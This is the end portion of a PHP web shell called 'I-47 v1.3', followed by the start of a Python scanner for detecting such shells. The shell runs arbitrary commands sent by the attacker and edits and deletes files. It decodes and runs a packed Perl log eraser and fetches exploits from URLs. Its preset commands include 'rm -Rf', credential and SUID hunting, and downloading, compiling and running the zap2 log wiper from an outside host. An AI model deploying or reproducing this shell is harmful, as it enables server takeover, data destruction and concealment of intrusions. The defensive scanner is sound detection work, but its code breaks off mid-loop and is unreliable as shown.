4125                                 else if (isset($_GET['secinfo'])) { ?>
4126 <br><br><center><font color =red size=5>Server security information</font><br><br></center>
4127    <table style="width:100%;" border="1">
4128    <tr>
4129        <td style="width:7%;">Curl</td>
4130        <td style="width:7%;">Oracle</td>
4131        <td style="width:7%;">MySQL</td>
4132        <td style="width:7%;">MSSQL</td>
4133        <td style="width:7%;">PostgreSQL</td>
4134        <td style="width:12%;">Open Base Directory</td>
4135        <td style="width:10%;">Safe_Exec_Dir</td>
4136        <td style="width:7%;">PHP Version</td>
4137        <td style="width:7%;">Server Admin</td> 
4138    </tr>
4139    <tr>
4140        <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4141        <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4142        <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4143        <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4144        <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4145        <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4146        <td style="width:10%;"><font class="txt"><?php if (@function_exists('ini_get')) {
4147                                         if ('' == ($df = @ini_get('safe_mode_exec_dir'))) {
4148                                             echo "<font color=red>NONE</font></b>";
4149                                         } else {
4150                                             echo "<font color=green>$df</font></b>";
4151                                         };
4152                                     } ?></font></td>
4153        <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4154        <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4155    </tr>
4156 </table><br> <?php
4157                                     mysecinfo();
4158                                 } else if (isset($_GET['perms'])) {
4159 ?>
4160     <form method="POST" action="<?php echo $self; ?>" >
4161    <input type="hidden" name="myfilename" value="<?php echo $_GET['file']; ?>">
4162         <table align="center" border="1" style="width:40%;">
4163             <tr>
4164                 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td> 
4165             </tr>
4166            <tr>
4167                <td colspan="2" align="center" style="height:60px">
4168         <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changeperms"/></td>
4169            </tr>
4170         </table>
4171        
4172    </form>   
4173     <?php
4174                                 } else if (isset($_GET['rename'])) {
4175 ?>
4176     <form method="GET" action="<?php echo $self; ?>" >
4177    <input type="hidden" name="getdir" value="<?php echo $_GET['getdir']; ?>">
4178         <table>
4179             <tr>
4180                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename']; ?>" name="file" class="box" /></td>
4181             </tr>
4182             <tr>
4183                 <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename']; ?>" name="to" class="box" /></td> 
4184             </tr>
4185         </table>
4186        <br>
4187         <input type="Submit" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4188 </form>   
4189     <?php
4190                                 } else if (isset($_GET['open'])) {
4191 ?>
4192         <form method="POST" action="<?php echo $self; ?>">
4193         <table>
4194             <tr>
4195                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['open']; ?>" class="box" name="file" /></td>
4196             </tr>
4197             <tr>
4198                 <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']); ?>" class="box" /></td> 
4199             </tr>
4200         </table>
4201         <textarea name="content" rows="20" cols="100" class="box"><?php
4202                                     $content = htmlspecialchars(file_get_contents($_GET['open']));
4203                                     if ($content) {
4204                                         echo $content;
4205                                     } else if (function_exists('fgets') && function_exists('fopen') && function_exists('feof')) {
4206                                         fopen($_GET['open']);
4207                                         while (!feof()) {
4208                                             echo htmlspecialchars(fgets($_GET['open']));
4209                                         }
4210                                     }
4211 ?>
4212         </textarea><br />
4213         <input name="save" type="Submit" value="Save Changes" id="spacing" class="but"/>
4214         </form>
4215     <?php
4216                                 } else if (isset($_POST['file']) && isset($_POST['content'])) {
4217                                     if (is_dir($_POST['file'])) {
4218                                         header("location:" . $self . "?dir=" . $_POST['file']);
4219                                     }
4220                                     if (file_exists($_POST['file'])) {
4221                                         $handle = fopen($_POST['file'], "w");
4222                                         fwrite($handle, $_POST['content']);
4223                                         header("Location:$self");
4224                                     } else {
4225                                         echo "<p class='alert'>File Name Specified does not exists!</p>";
4226                                     }
4227                                 } else if (isset($_GET['selfkill'])) {
4228                                     unlink(__FILE__);
4229                                     echo "<br><center><font color=lime size=5>Good Bye......</font></center>";
4230                                 } else if (isset($_POST['executecmd'])) {
4231                                     if ($_POST['mycmd'] == "logeraser") {
4232                                         $erase = gzinflate(base64_decode("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"));
4233                                         if (is_writable(".")) {
4234                                             if ($openp = fopen(getcwd() . "/logseraser.pl", 'w')) {
4235                                                 fwrite($openp, $erase);
4236                                                 fclose($openp);
4237                                                 passthru("perl logseraser.pl linux");
4238                                                 unlink("logseraser.pl");
4239                                                 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
4240                                             }
4241                                         } else {
4242                                             if ($openp = fopen("/tmp/logseraser.pl", 'w')) {
4243                                                 fwrite($openp, $erase) or die("Error");
4244                                                 fclose($openp);
4245                                                 $aidx = passthru("perl logseraser.pl linux");
4246                                                 unlink("logseraser.pl");
4247                                                 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
4248                                             }
4249                                         }
4250                                     } else {
4251                                         $check = shell_exec($_POST['mycmd']);
4252                                         echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
4253                                     }
4254                                 } else if (isset($_POST['changefileperms'])) {
4255                                     if ($_POST['chmode'] != null && is_numeric($_POST['chmode'])) {
4256                                         $actbox = $_POST["actbox3"];
4257                                         foreach ($actbox as $v) {
4258                                             $perms = 0;
4259                                             for ($i = strlen($_POST['chmode']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['chmode'][$i] * pow(8, (strlen($_POST['chmode']) - $i - 1));
4260                                             echo "<center><div align=left style=width:60%;>";
4261                                             if (@chmod($v, $perms)) echo "<blink><font size=3 color=lime>File $v Permissions Changed Successfully</font></blink>";
4262                                             else echo "<blink><font size=3 color=red>Cannot Change $v File Permissions</font></blink>";
4263                                             echo "</div></center>";
4264                                         }
4265                                     }
4266                                 } else if (isset($_POST['choice'])) {
4267                                     if ($_POST['choice'] == "chmod") { ?>
4268        <form method="POST" ><?php
4269                                         $actbox1 = $_POST['actbox'];
4270                                         foreach ($actbox1 as $v) { ?>
4271            <input type="hidden" name="actbox3[]" value="<?php echo $v; ?>">
4272        <?php
4273                                         }
4274 ?>
4275            <table align="center" border="1" style="width:40%;">
4276                <tr>
4277                    <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td> 
4278                </tr>
4279                <tr>
4280                    <td colspan="2" align="center" style="height:60px">
4281            <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changefileperms"/></td>
4282                </tr>
4283            </table>
4284            
4285        </form>  <?php
4286                                     } else if ($_POST['choice'] == "delete") {
4287                                         $actbox = $_POST["actbox"];
4288                                         foreach ($actbox as $v) {
4289                                             if (is_file($v)) {
4290                                                 if (unlink($v)) {
4291                                                     echo "<br><center><font color=lime size=3>File $v Deleted Successfully</font></center>";
4292                                                 } else echo "<br><center><font color=red size=3>Cannot Delete File $v</font></center>";
4293                                             } else if (is_dir($v)) {
4294                                                 rrmdir($v);
4295                                                 $loc = $_SERVER['REQUEST_URI'];
4296                                                 header("Location:$loc");
4297                                                 ob_end_flush();
4298                                             }
4299                                         }
4300                                     } else if ($_POST['choice'] == "compre") {
4301                                         $actbox = $_POST["actbox"];
4302                                         foreach ($actbox as $v) {
4303                                             if (is_file($v)) {
4304                                                 $zip = new ZipArchive();
4305                                                 $filename = basename($v) . '.zip';
4306                                                 if (($zip->open($filename, ZipArchive::CREATE)) !== true) {
4307                                                     echo '<br><font color=red size=3>Error: Unable to create zip file for $v</font>';
4308                                                 } else {
4309                                                     echo "<br><font color=lime size=3>File $v Compressed successfully</font>";
4310                                                 }
4311                                                 $zip->addFile(basename($v));
4312                                                 $zip->close();
4313                                             } else if (is_dir($v)) {
4314                                                 if ($os == "Linux") {
4315                                                     $filename = basename($v);
4316                                                     execmd("tar --create --recursion --file=$filename.tar $v");
4317                                                     echo "<br><font color=lime size=3>File $v Compressed successfully as $v.tar</font>";
4318                                                 }
4319                                             }
4320                                         }
4321                                     } else if ($_POST['choice'] == "uncompre") {
4322                                         $actbox = $_POST["actbox"];
4323                                         foreach ($actbox as $v) {
4324                                             $zip = new ZipArchive;
4325                                             $filename = basename($v);
4326                                             $res = $zip->open($filename);
4327                                             if ($res === TRUE) {
4328                                                 $pieces = explode(".", $filename);
4329                                                 $zip->extractTo($pieces[0]);
4330                                                 $zip->close();
4331                                                 echo "<br><font color=lime size=3>File $v Unzipped successfully</font>";
4332                                             } else {
4333                                                 echo "<br><font color=red size=3>Error: Unable to Unzip file $v</font>";
4334                                             }
4335                                         }
4336                                     }
4337                                 } else if (isset($_POST['execute'])) {
4338                                     $comm = $_POST['execute'];
4339                                     chdir($_POST['executepath']);
4340                                     $check = shell_exec($comm);
4341                                     echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
4342 ?>
4343            <BR><BR><center><form action="<?php $self; ?>" method="post">
4344            <input type="hidden" name="executepath" value="<?php echo $_POST['executepath']; ?>" />
4345            <input type="text" class="box" name="execute">
4346            <input type="submit" value="Execute" class="but"></form></center>
4347            <?php
4348                                 } else if (isset($_POST['Create'])) {
4349 ?>
4350    <form method="post">
4351    
4352    <input type="hidden" name="filecreator" value="<?php echo $_POST['createfile']; ?>">
4353        <textarea name="filecontent" rows="20" cols="100" class="box"></textarea><br />
4354         <input name="createmyfile" type="Submit" value="  Save " id="spacing" class="but"/>
4355   </form>
4356        
4357    <?php
4358                                 } else {
4359                                     $mydir = basename(dirname(__FILE__));
4360                                     $pdir = str_replace($mydir, "", $dir);
4361                                     $pdir = str_replace("/", "", $dir);
4362                                     $files = array();
4363                                     $dirs = array();
4364                                     $odir = opendir($dir);
4365                                     while ($file = readdir($odir)) {
4366                                         if (is_dir($dir . '/' . $file)) {
4367                                             $dirs[] = $file;
4368                                         } else {
4369                                             $files[] = $file;
4370                                         }
4371                                     }
4372                                     $countfiles = count($dirs) + count($files);
4373                                     $dircount = count($dirs);
4374                                     $dircount = $dircount - 2;
4375 ?>
4376    <table style="width:95%;" align="center" cellpadding="3">
4377    <tr style="background-color:#161616;"><td colspan="7" align="center"><font color="red" size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount . ' Dirs And ' . count($files) . ' Files'; ?>)</td>
4378     <tr style="background-color:#161616; height:12px;">
4379         <th style="width:53%;">Name</th>
4380         <th style="width:7%;">Size</th>
4381         <th style="width:9%;">Permissions</th>
4382        <th style="width:12%;">Modification Date</th>
4383         <th style="width:6%;">Rename</th>
4384        <th style="width:7%;">Download</th>
4385        <th style="width:3%;">Action</th>
4386     </tr>
4387    
4388 <?php
4389                                     if (isset($_GET['download'])) {
4390                                         download();
4391                                     }
4392 ?>
4393    <form method="post" id="myform" name="myform">
4394    <?php
4395                                     $dir = getcwd();
4396                                     if (isset($_GET['dir'])) {
4397                                         $dir = $_GET['dir'];
4398                                     }
4399                                     $i = 0;
4400                                     if (is_dir($dir)) {
4401                                         if ($countfiles == 2) echo "<tr><td colspan=5><center><font color=red size=3>No files or directory present or Cannot view files and directory</font></center></td></tr>";
4402                                         foreach ($dirs as $val) {
4403 ?>
4404            <font color="#999999">
4405            <?php if ($val == ".") {
4406 ?><tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'"><td class='info'><a href='<?php echo $self; ?>'><font class=txt>[ . ]</font></a></td><td>CURDIR</td>
4407            <td><?php if (is_writable(getcwd())) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font color="#00CC00"><?php echo getFilePermissions(getcwd()); ?></font></a><?php
4408                                                 } else if (is_readable(getcwd())) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font color="#FF0000"><?php echo getFilePermissions(getcwd()); ?></font></a><?php
4409                                                 } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font color="#FFFFFF"><?php echo getFilePermissions(getcwd()); ?></font><?php
4410                                                 } ?></td>
4411            
4412            <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime(getcwd())); ?></font></td>
4413            <td></td><td></td><td></td></</tr><?php
4414                                             } else if ($val == "..") {
4415                                                 $val = Trail($dir . $directorysperator . $val, $directorysperator); ?>
4416            <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'"><td class='info'><a href='<?php echo $self . "?dir=" . $val; ?>'><font class=txt>[ .. ]</font></a></td><td>UPDIR</td>
4417            <td><?php if (is_writable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($val); ?></font></a><?php
4418                                                 } else if (is_readable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($val); ?></font></a><?php
4419                                                 } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($val); ?></font><?php
4420                                                 } ?></td>
4421            
4422            <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
4423            <td></td><td></td><td></td></</tr><?php continue;
4424                                             }
4425                                         }
4426                                         foreach ($dirs as $val) {
4427                                             $i++;
4428 ?>
4429            <font color="#999999">
4430                
4431            <?php if ($val == "." || $val == "..") continue; ?>
4432            <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
4433            <td class='dir'><a href='<?php echo $self ?>?dir=<?php echo $dir . $directorysperator . $val; ?>'>[ <?php echo $val; ?> ]</a></td>
4434            <td class='info'>DIR</td>
4435             <td class='info'><?php if (is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4436                                             } else if (is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4437                                             } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font><?php
4438                                             } ?></td>
4439            <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
4440            <td class="info"><a href="<?php echo $self; ?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val; ?>">Rename</a></td>
4441            <td></td>
4442            <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val; ?>"></td>
4443             </tr></font>
4444             <?php
4445                                         }
4446                                         foreach ($files as $val) {
4447                                             $i++;
4448 ?>
4449                    <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
4450                    <td class='file'><a href='<?php echo $self ?>?open=<?php echo $dir . $directorysperator . $val; ?>'><?php if (("/" . $val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) {
4451                                                 echo "<font color=red>" . $val . "</font>";
4452                                             } else {
4453                                                 echo $val;
4454                                             } ?></a></td>
4455                   <td class='info'><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val)); ?></td>
4456                    <td class='info'><?php if (is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4457                                             } else if (is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4458                                             } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font><?php
4459                                             } ?></td>
4460                   <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
4461                    <td class="info"><a href="<?php echo $self; ?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val; ?>">Rename</a></td>
4462                   <td class="info"><a href="<?php echo $self; ?>?download=<?php echo $dir . $directorysperator . $val; ?>">Download</a>
4463                   <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val; ?>"></td>
4464                    </tr>
4465                    <p>
4466             <?php
4467                                         }
4468                                     } else {
4469                                         echo "<p><font color=red size=4>" . $_GET['dir'] . " is <b>NOT</b> a Valid Directory!<br /></font></p>";
4470                                     }
4471                                     echo "</table>
4472 <div align='right' style='width:97%;'><BR><input type='checkbox' name='checkall' onclick='checkedAll();'> <font color=lime size=3>Check All </font> &nbsp;
4473 <select class=sbox name=choice style='width: 100px;'>
4474           <option value=delete>Delete</option>
4475           <option value=chmod>Change mode</option>
4476           if(class_exists('ZipArchive'))
4477           {   <option value=compre>Compress</option>
4478           <option value=uncompre>Uncompress</option> }
4479       </select>
4480   
4481   <input type=submit value=Submit name=checkoption class=but></form></div>";
4482                                 }
4483 ?>
4484 </p>
4485 <table style="width:100%;" border="1">
4486 <tr>
4487 <td align="center">
4488 <form method="post" enctype="multipart/form-data">
4489        
4490        Upload file : <br><input type="file" name="uploadfile" class="box" size="50"><input type="hidden" name="path" value="<?php echo $dir; ?>" />&nbsp;<input type=submit value="Upload" name="u" value="u" class="but" ></form>
4491         <?php
4492                                 if (is_writable($dir)) {
4493                                     echo '<font color=lime>< writable ></font>';
4494                                 } else {
4495                                     echo '< not writable >';
4496                                 }
4497 ?>
4498          <br>
4499        
4500 
4501 
4502 </td>
4503 <td align="center" style="height:105px;">Create File : 
4504 <form method="post">
4505 <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile"> <input type="submit" value="Create" name="Create" class="but">
4506 </form>
4507 <?php
4508                                 if (is_writable($dir)) {
4509                                     echo '<font color=lime>< writable ></font>';
4510                                 } else {
4511                                     echo '< not writable >';
4512                                 }
4513 ?>
4514 </td>
4515 </tr>
4516 <tr>
4517 <td align="center" style="height:105px;">Execute : <form action="<?php echo $self; ?>" method="post">
4518 <input type="hidden" name="executepath" value="<?php echo $dir; ?>" />
4519 <input type="text" class="box" name="execute"> <input type="submit" value="Execute" class="but"></form></td>
4520 
4521 <td align="center">Create Directory : <form method="post">
4522 <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder"> 
4523 <input type="submit" value="Create" name="createdir" class="but">
4524 </form><?php
4525                                 if (is_writable($dir)) {
4526                                     echo '<font color=lime>< writable ></font>';
4527                                 } else {
4528                                     echo '< not writable >';
4529                                 }
4530 ?></td></tr>
4531 <tr><td style="height:105px;" align="center">Get Exploit&nbsp;<form method="post" actions="<?php echo $self; ?>">
4532 <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c"><br><br>
4533 <input type="hidden" name="path" value="<?php echo $dir; ?>">
4534 <select name="functiontype" class="sbox"> 
4535 <option value="wwget">wget</option> 
4536 <option value="wlynx">lynx</option> 
4537 <option value="wfread">fread</option> 
4538 <option value="wfetch">fetch</option> 
4539 <option value="wlinks">links</option> 
4540 <option value="wget">GET</option> 
4541 <option value="wcurl">curl</option> 
4542 </select>
4543 <input type="submit" name="uploadurl" value="  G0  " class="but"></form>
4544 </td>
4545 <td align="center">
4546 <form method="post" action="<?php echo $self; ?>">
4547 Some Commands<br>
4548 <?php if ($os != "Windows") { ?>
4549 <SELECT NAME="mycmd" class="box">
4550      <OPTION VALUE="uname -a">Kernel version
4551      <OPTION VALUE="w">Logged in users
4552      <OPTION VALUE="lastlog">Last to connect
4553     <option value='cat /etc/hosts'>IP Addresses
4554     <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
4555     <OPTION VALUE="logeraser">Log Eraser
4556     <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
4557     <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
4558     <OPTION VALUE="find / -type f -name \"config*\"">find config* files
4559     <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
4560     <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
4561     <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
4562      <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
4563      <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
4564     <?php if (is_dir('/etc/valiases')) { ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php
4565                                     } ?>
4566     <?php if (is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php
4567                                     } ?>
4568      <OPTION VALUE="which wget curl w3m lynx">Downloaders?
4569      <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
4570     <OPTION VALUE="ps aux">Show running proccess
4571     <OPTION VALUE="uptime">Uptime check
4572     <OPTION VALUE="cat /proc/meminfo">Memory check
4573      <OPTION VALUE="netstat -an | grep -i listen">Open ports
4574     <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
4575      <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
4576      <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
4577      <OPTION VALUE="./zap2">WIPELOGS PT3
4578     <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
4579  </SELECT>
4580  <?php
4581                                 } else { ?>
4582  <SELECT NAME="mycmd" class="box">
4583        <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
4584    <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
4585    <OPTION VALUE="systeminfo">System Informations
4586    <OPTION VALUE="net user">User accounts
4587     <OPTION VALUE="netstat -an">Open ports
4588    <OPTION VALUE="getmac">Get Mac Address
4589    <OPTION VALUE="net start">Show running services
4590    <OPTION VALUE="net view">Show computers
4591    <OPTION VALUE="arp -a">ARP Table
4592    <OPTION VALUE="tasklist">Show Process
4593    <OPTION VALUE="ipconfig/all">IP Configuration
4594    
4595  </SELECT>
4596  <?php
4597                                 } ?>
4598 <input type="submit" value="Execute" class="but" name="executecmd">
4599 </form>
4600 </td>
4601 </tr></table><br>
4602    
4603 </td>
4604 </tr>
4605 </table>
4606 <?php
4607                                 //logout
4608                                 if (isset($_GET['logout'])) {
4609                                     setcookie("hacked", time() - 60 * 60);
4610                                     header("Location:$self");
4611                                     ob_end_flush();
4612                                 }
4613 ?>
4614 
4615 
4616 <hr>
4617 <div align="center">
4618 <font size="6" face="Times New Roman, Times, serif" color="#00CC00">I-47 v1.3 <br>
4619 --==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">&#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342;</font></a></div>
4620 <?php
4621                             }
4622                         }
4623                         if (isset($_POST['uname']) && isset($_POST['passwd'])) {
4624                             if ($_POST['uname'] == $user && $_POST['passwd'] == $pass) {
4625                                 setcookie("hacked", md5($pass));
4626                                 $selfenter = $_SERVER["PHP_SELF"];
4627                                 header("Location:$selfenter");
4628                             }
4629                         }
4630                         if ((!isset($_COOKIE['hacked']) || $_COOKIE['hacked'] != md5($pass))) {
4631 ?>
4632    <center>
4633    <form method="POST">
4634    <div style="background-color:#006600; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
4635        <table cellpadding="9" cellspacing="4">
4636            <tr>
4637                <td align="center" colspan="2"><blink><font size="7"><b>I-47 v1.3 </b></font></blink></td>
4638            </tr>
4639            <tr>
4640                <td align="right"><b>User Name : </b></td>
4641                <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;"  value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
4642            </tr>
4643            <tr>
4644                <td align="right"><b>Password : </b></td>
4645                <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;"  value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
4646            </tr>
4647            <tr>
4648                <td align="center" colspan="2"><input type="submit" class="but" value="     Enter     "></td>
4649            </tr>
4650            <tr>
4651                <td colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
4652            </tr>
4653        </table>
4654    </div>
4655    
4656    </form>
4657    </center>
4658 <br>
4659 </body>
4660 </html>
4661 <?php
4662                         }
4663 ?>
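For defenders triaging a PHP web root, the constructs in the listing above make usable static indicators: request parameters passed to `shell_exec`, a `gzinflate(base64_decode(...))` blob, `unlink(__FILE__)`, a request-controlled `fopen` write, and a login cookie compared against `md5($pass)`. The scanner below is an added example, not part of the I-47 source or the original post; the rule names, weights, threshold and both sample inputs are assumptions constructed for illustration.

```python
import re
from typing import List, NamedTuple

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)"
EXEC_FUNCS = r"\b(?:shell_exec|passthru|system|exec|popen|proc_open)"


class Finding(NamedTuple):
    line: int
    rule: str
    weight: int
    snippet: str


# (rule id, weight, pattern). Ids and weights are this example's own choices.
PATTERN_RULES = [
    # e.g. shell_exec($_POST['mycmd'])
    ("request-to-exec", 5,
     re.compile(EXEC_FUNCS + r"\s*\(\s*" + SUPERGLOBAL + r"\s*\[")),
    # e.g. fopen($_POST['file'], "w")
    ("request-to-write", 4,
     re.compile(r"\bfopen\s*\(\s*" + SUPERGLOBAL + r"\s*\[[^\]]+\]\s*,\s*[\"'][wa]")),
    # e.g. gzinflate(base64_decode("..."))
    ("packed-payload", 3, re.compile(r"\bgzinflate\s*\(\s*base64_decode\s*\(")),
    # e.g. unlink(__FILE__)
    ("self-delete", 3, re.compile(r"\bunlink\s*\(\s*__FILE__\s*\)")),
    # e.g. $_COOKIE['hacked'] != md5($pass)
    ("static-cookie-auth", 2,
     re.compile(r"\$_COOKIE\s*\[[^\]]+\]\s*(?:!==?|===?)\s*md5\s*\(")),
]

# One-hop taint: $comm = $_POST['execute']; ... shell_exec($comm);
ASSIGN_FROM_REQUEST = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*" + SUPERGLOBAL + r"\s*\[")
EXEC_WITH_VAR = re.compile(EXEC_FUNCS + r"\s*\(\s*(\$[A-Za-z_]\w*)\s*[,)]")


def _finding(source: str, pos: int, rule: str, weight: int) -> Finding:
    line = source.count("\n", 0, pos) + 1
    return Finding(line, rule, weight, source.splitlines()[line - 1].strip())


def scan(source: str) -> List[Finding]:
    """Return indicator hits in PHP source, ordered by line number."""
    findings = []
    for rule, weight, pattern in PATTERN_RULES:
        for m in pattern.finditer(source):
            findings.append(_finding(source, m.start(), rule, weight))
    # Variables assigned directly from a request superglobal anywhere in the file.
    tainted = {m.group(1) for m in ASSIGN_FROM_REQUEST.finditer(source)}
    for m in EXEC_WITH_VAR.finditer(source):
        if m.group(1) in tainted:
            findings.append(_finding(source, m.start(), "tainted-exec", 5))
    return sorted(findings, key=lambda f: (f.line, f.rule))


def score(findings: List[Finding]) -> int:
    """Sum the weight of each distinct rule once, so repeats do not inflate it."""
    return sum({f.rule: f.weight for f in findings}.values())


def verdict(findings: List[Finding], threshold: int = 6) -> str:
    total = score(findings)
    if total >= threshold:
        return "likely-webshell"
    return "review" if total else "clean"


# Constructed sample: condensed from statements in the listing above, with the
# encoded blob replaced by a placeholder.
SHELL_EXCERPT = r'''<?php
if (isset($_GET['selfkill'])) {
    unlink(__FILE__);
} else if (isset($_POST['executecmd'])) {
    if ($_POST['mycmd'] == "logeraser") {
        $erase = gzinflate(base64_decode("PLACEHOLDER"));
    } else {
        $check = shell_exec($_POST['mycmd']);
    }
} else if (isset($_POST['execute'])) {
    $comm = $_POST['execute'];
    chdir($_POST['executepath']);
    $check = shell_exec($comm);
} else if (isset($_POST['file']) && isset($_POST['content'])) {
    $handle = fopen($_POST['file'], "w");
    fwrite($handle, $_POST['content']);
}
if ((!isset($_COOKIE['hacked']) || $_COOKIE['hacked'] != md5($pass))) {
    // login form
}
'''

# Constructed benign sample: same functions, but no request data reaches them.
BENIGN_SAMPLE = r'''<?php
$key = md5($_SERVER['REQUEST_URI']);
$uptime = shell_exec("uptime");
$fh = fopen(__DIR__ . "/cache/" . $key, "w");
fwrite($fh, $uptime);
'''

if __name__ == "__main__":
    for label, src in (("shell excerpt", SHELL_EXCERPT), ("benign", BENIGN_SAMPLE)):
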